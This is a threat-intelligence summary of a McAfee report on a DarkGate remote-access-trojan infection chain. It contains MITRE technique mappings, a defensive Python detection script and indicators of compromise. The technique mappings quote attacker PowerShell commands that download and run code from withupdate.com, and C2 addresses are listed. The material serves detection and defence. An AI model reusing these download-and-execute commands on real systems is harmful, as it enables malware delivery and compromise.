McAfee Labs uncovered a two-stage DarkGate infection chain beginning with an HTML entry point and leveraging AutoHotkey for payload execution, including SmartScreen evasion. The campaign combines VBScript, PowerShell, WebDAV/OneDrive deception, and persistence mechanisms to drop a Delphi-based RAT that exfiltrates to a C2 IP.
Keypoints
- DarkGate is a Delphi-based Remote Access Trojan marketed as MaaS on a Russian-language cybercrime forum since 2018.
- The infection chain starts with HTML phishing and unfolds through AutoHotkey-based stages to deliver the final DarkGate payload.
- DarkGate includes evasion tactics that bypass Defender SmartScreen, exploiting CVE-2023-36025 and CVE-2024-21412 to achieve the bypass.
- Two initial vectors, HTML and XLS, carry identical DarkGate shellcode and payload, including a deceptive WebDAV/OneDrive-related flow.
- The chain deploys VBScript and PowerShell to fetch and execute additional payloads before invoking AutoHotkey to run a script that decodes and executes shellcode.
- Persistence is achieved via a .lnk startup item and a dropped hidden folder (hakeede) with replicated artifacts, while exfiltration targets 5.252.177.207.
MITRE Techniques
- [T1566.001] Phishing – The infection chain initiates with a phishing HTML page masquerading as a Word document. ‘phishing HTML page masquerading as a Word document’
- [T1204.002] User Execution – Users are prompted to open the document in “Cloud View,” creating a deceptive lure for interaction. ‘Users are prompted to open the document in “Cloud View”’
- [T1027] Obfuscated/Compressed Data – The HTML/referenced content uses string reversal and base64 decoding to hide payloads. ‘On reversing and base64 decoding the yellow highlighted content…’
- [T1059.001] PowerShell – PowerShell is used to download and execute a script from a remote URL via Invoke-RestMethod. ‘Invoke-RestMethod -Uri 'withupdate.com/zuyagaoq'’
- [T1059.005] VBScript – The chain begins with a VBScript executed by WScript to drop and run subsequent payloads. ‘The sequence of commands begins with the execution of the VBScript file located at “C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29\Report-26-2024[1].vbs”’
- [T1105] Ingress Tool Transfer – VBScript/PowerShell fetches and downloads additional components from remote URLs. ‘Invoke-WebRequest -Uri "http://withupdate.com/oudowibspr" -OutFile 'C:/rjtu/temp_AutoHotkey.exe'’
- [T1547.001] Boot or Logon Autostart – A .lnk file is dropped into the startup folder to ensure persistence. ‘For maintaining persistence, a .lnk file is dropped in startup folder’
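As an added illustration of how the artifacts above could be turned into detection logic (example code written for this summary, not McAfee's or the blog's), the following Python triages constructed Sysmon-style events for the chain's observable steps: wscript.exe spawning a PowerShell downloader, AutoHotkey running from a non-standard path, a .lnk written to the Startup folder, a reference to the hakeede folder, and a connection to one of the listed IPs. The event field names, the .ahk script name, the .lnk name and the hakeede location are assumptions.

```python
import re

# Indicators and command-line artifacts taken from the write-up summarised above.
C2_IPS = {"5.252.177.207", "103.124.106.237"}
DOWNLOAD_CMDLET = re.compile(r"Invoke-(RestMethod|WebRequest)\b", re.I)
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)
TRUSTED_AHK_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")


def classify(event):
    """Return (label, reason) pairs matched by one Sysmon-style event dict."""
    hits = []
    kind = event.get("type")
    if kind == "process":
        parent = event.get("parent", "").lower()
        image = event.get("image", "").lower()
        if (parent.endswith("wscript.exe") and image.endswith("powershell.exe")
                and DOWNLOAD_CMDLET.search(event.get("cmdline", ""))):
            hits.append(("T1059.005/T1105", "VBScript spawned a PowerShell downloader"))
        if "autohotkey" in image and not image.startswith(TRUSTED_AHK_DIRS):
            hits.append(("AutoHotkey", "AutoHotkey run from unusual path " + event["image"]))
    elif kind == "file" and STARTUP_LNK.search(event.get("path", "")):
        hits.append(("T1547.001", "startup .lnk written: " + event["path"]))
    elif kind == "network" and event.get("dst") in C2_IPS:
        hits.append(("C2", "connection to listed DarkGate address " + event["dst"]))
    # The hidden folder name can surface in any path-bearing field, so check them all.
    if "\\hakeede\\" in " ".join(str(v) for v in event.values()).lower():
        hits.append(("hakeede", "reference to the dropped hidden folder"))
    return hits


def scan(events):
    """Run classify() over an event list; returns [(event_index, label, reason), ...]."""
    return [(i, lab, why) for i, ev in enumerate(events) for lab, why in classify(ev)]


# Constructed sample telemetry modelled on the chain described above (not real logs).
SAMPLE_EVENTS = [
    {"type": "process", "parent": "C:\\Windows\\System32\\wscript.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -c Invoke-RestMethod -Uri 'withupdate.com/zuyagaoq'"},
    {"type": "process", "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "image": "C:\\rjtu\\temp_AutoHotkey.exe", "cmdline": "temp_AutoHotkey.exe script.ahk"},
    {"type": "process", "parent": "C:\\Windows\\explorer.exe",  # benign: trusted install dir
     "image": "C:\\Program Files\\AutoHotkey\\AutoHotkey.exe", "cmdline": "AutoHotkey.exe hotkeys.ahk"},
    {"type": "file", "path": "C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.lnk"},
    {"type": "file", "path": "C:\\Users\\admin\\hakeede\\temp_AutoHotkey.exe"},  # location assumed
    {"type": "network", "dst": "5.252.177.207", "port": 443},
    {"type": "network", "dst": "203.0.113.5", "port": 443},  # benign documentation address
]

if __name__ == "__main__":
    for idx, label, why in scan(SAMPLE_EVENTS):
        print(f"event {idx}: [{label}] {why}")
```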
Indicators of Compromise
- [File hash] Html file – 196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005
- [File hash] URL file – 2b296ffc6d173594bae63d37e2831ba21a59ce385b87503710dc9ca439ed7833
- [File hash] VBS – 038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907
- [File hash] autohotkey.exe – 897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb
- [File hash] AHK script – dd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455
- [File hash] test.txt – 4de0e0e7f23adc3dd97d498540bd8283004aa131a59ae319019ade9ddef41795
- [File hash] DarkGate exe – 6ed1b68de55791a6534ea96e721ff6a5662f2aefff471929d23638f854a80031
- [IP] 5.252.177.207 – Exfiltration target / C2 endpoint
- [File hash] XLS file – 1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4
- [File hash] VBS – 2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f
- [File hash] LNK file – 10e362e18c355b9f8db9a0dbbc75cf04649606ef96743c759f03508b514ad34e
- [IP] 103.124.106.237 – Command and control remote script or download source
Read more: https://www.mcafee.com/blogs/?p=190356